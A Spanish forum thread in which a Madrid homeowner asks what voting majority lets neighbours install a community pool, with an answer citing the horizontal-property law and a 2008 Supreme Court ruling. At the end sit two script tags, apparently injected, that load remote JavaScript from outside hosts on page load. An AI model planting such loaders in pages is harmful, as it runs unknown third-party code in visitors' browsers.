Instalación de piscina en comunidad de propietarios

Se están planteando algunos vecinos el instalar una piscina en mi comunidad. Mi pregunta es básicamente la siguiente:Conque indice de participación se ha de contar para que se lleve a cabo laobra. Pues hay varios que no quieren ni oírlo y se rumorea que ya estánhablando con instaladores y excavadoras para hacer el hueco. ( La Fincaestá en Madrid Capital)La vecindad tiene 172 vecinos y sonviviendas de VPO, hay impagos y morosos en la cuotas. O sea que haygente que no está al corriente. Ademas que se ya se paga una fuertecuota de comunidad y no estoy dispuesto a pagar más. Y que la gente usela piscina luego sin pagar las cuotas.Puedo negarme ano querer la piscina como muchos, que no querrán porque eso genera masgastos y no vamos a poder sufragar. Hay cosas mas beneficiosas queinstalar una piscina para el ocio de uno cuantos pudientes. Que soluciónhay para que no se instale la dichosa piscina. Incluso quieren subir lacuota comunitaria. Muchas graciasEn espera de sus noticias reciba un cordial sal

1 Respuesta

Respuesta

La ley de propiedad horizontal establece en su artículo 17.1 LPH que son necesarios 3/5 de cuotas y votos en junta para poder aprobar la instalación de la piscina.

Pero hay jurisprudencia como la Sentencia del Tribunal Supremo, Sala de lo Civil, de 9 octubre 2008 que establece que es necesaria la unanimidad, con lo que si usted se opone en la junta a dicha instalación basándose en ésta sentencia no podrían instalarla.

Sabe si hay mas sentencias de que al final no se hayan llevado las obras de instalaciones de piscinas? sin estar de acuerdo bastantes vecinos de una comunidad. Gracias.

Ésta al ser del tribunal supremo ha creado jurisprudencia no necesita mas.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>